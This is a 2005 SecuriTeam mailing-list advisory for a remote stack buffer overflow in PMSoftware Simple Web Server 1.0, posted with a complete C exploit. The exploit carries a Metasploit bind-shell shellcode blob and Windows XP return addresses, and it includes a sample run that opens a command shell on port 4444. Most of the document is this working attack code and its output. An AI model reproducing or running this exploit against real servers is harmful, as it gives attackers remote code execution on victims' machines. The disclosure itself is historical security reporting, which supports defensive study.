[EXPL] PMSoftware Simple Web Server Remote Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PMSoftware Simple Web Server Remote Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

" <http://www.pmx.it/> Simple Web Server the easy and small way to open an 
HTTP Web Server"

PMSoftware's Simple Web Server doesn't do proper bounds checking handling 
of normal GET requests. Sending an overlong page or script name, it causes 
an buffer overflow and an attacker can run arbitrary code on the victims 
machine.

DETAILS

Vulnerable Systems:
 * PMsoftware Web Server version 1.0

/*
 PMsoftware mini http server remote stack overflow exploit
 author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
 package : PMsoftware Web Server version 1.0
 advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
 company address : www.pmx.it
 timeline :
 17 Feb 2005 : bug found by ERNW Security
 18 Apr 2005 : Public Disclosure
 18 Apr 2005 : crash exploit released (ERNW Security)
 20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
  compiled with visual c++ 6 : cl pm.c
  greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
  ihsteam.com (persian) www.ihssecurity.com (english , just started)
  a big F*u to those who were/are/will trading konkoor questions-answers
  (c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0

-------- PMSoftware web server remote overflow exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444

D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PMSoftware>DONE !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680

// 5 byte GET + 241 byte NOP junk + 4 byte containing return address
// + 30 byte NOP  + 399 byte shellcode

// using metasploit great shellcode LPORT=4444 Size=399

unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
  
  
  unsigned int rc,sock,os,addr ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  char jmp_esp[5];
  unsigned short port;
  char GET[] = "\x47\x45\x54\x20\x2F";
  char winxpsp1[] = "\xCC\x59\xFB\x77";
  char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
  
 int main (int argc, char *argv[]){
  
 
  if(argc < 3) {
 printf("\n-------- PMSoftware web server remote overflow exploit by 
c0d3r\n");
 printf("-------- usage : pm.exe host port target\n");
 printf("-------- target 1 : windows xp service pack 1 : 0\n");
 printf("-------- target 2 : windows xp service pack 1 : 1\n");
 printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
 exit(-1) ;
  }
  printf("\n-------- PMSoftware web server remote overflow exploit by 
c0d3r\n\n");
 os = (unsigned short)atoi(argv[3]);
  switch(os)
  {
   case 0:
    strcat(jmp_esp,winxpsp1);
    break;
   case 1:
    strcat(jmp_esp,winxpsp2); // wasnt checked
    break;
   default:
    printf("\n[-] this target doesnt exist in the list\n\n");
   
    exit(-1);
  }
 
    // Creating heart of exploit code
  printf("[+] building overflow string");
  
    memset(buffer,NOP,size);
    memcpy(buffer,GET,sizeof(GET)-1);
 memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
    memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
    buffer[size] = 0;
 
 // EO heart of exploit code

  
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp)  && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){
   printf("[-] socket() error...\n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[+] connected\n") ;
     printf("[+] sending the overflow string\n") ;
  send(sock,buffer,strlen(buffer),0);
  printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
  }
  
  else {
      printf("[-] ouch! Server is not listening .... \n");
 }
  shutdown(sock,1);
  closesocket(sock);
  }
  // EO exploit code
  

Disclosure Timeline:
18.04.05 - Public Disclosure
18.04.05 - Crash exploit released (ERNW Security)
20.04.05 - IHS exploit released , winxpsp1 & winxpsp2 target


ADDITIONAL INFORMATION

The information has been provided by  <mailto:c0d3r@ihsteam.com> c0d3r.
The original article can be found at:  
<http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html> 
http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html

More about Simple Web Server vulnerabilities:
 <http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html> PMSoftware 
Simple Web Server Buffer Overflow



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.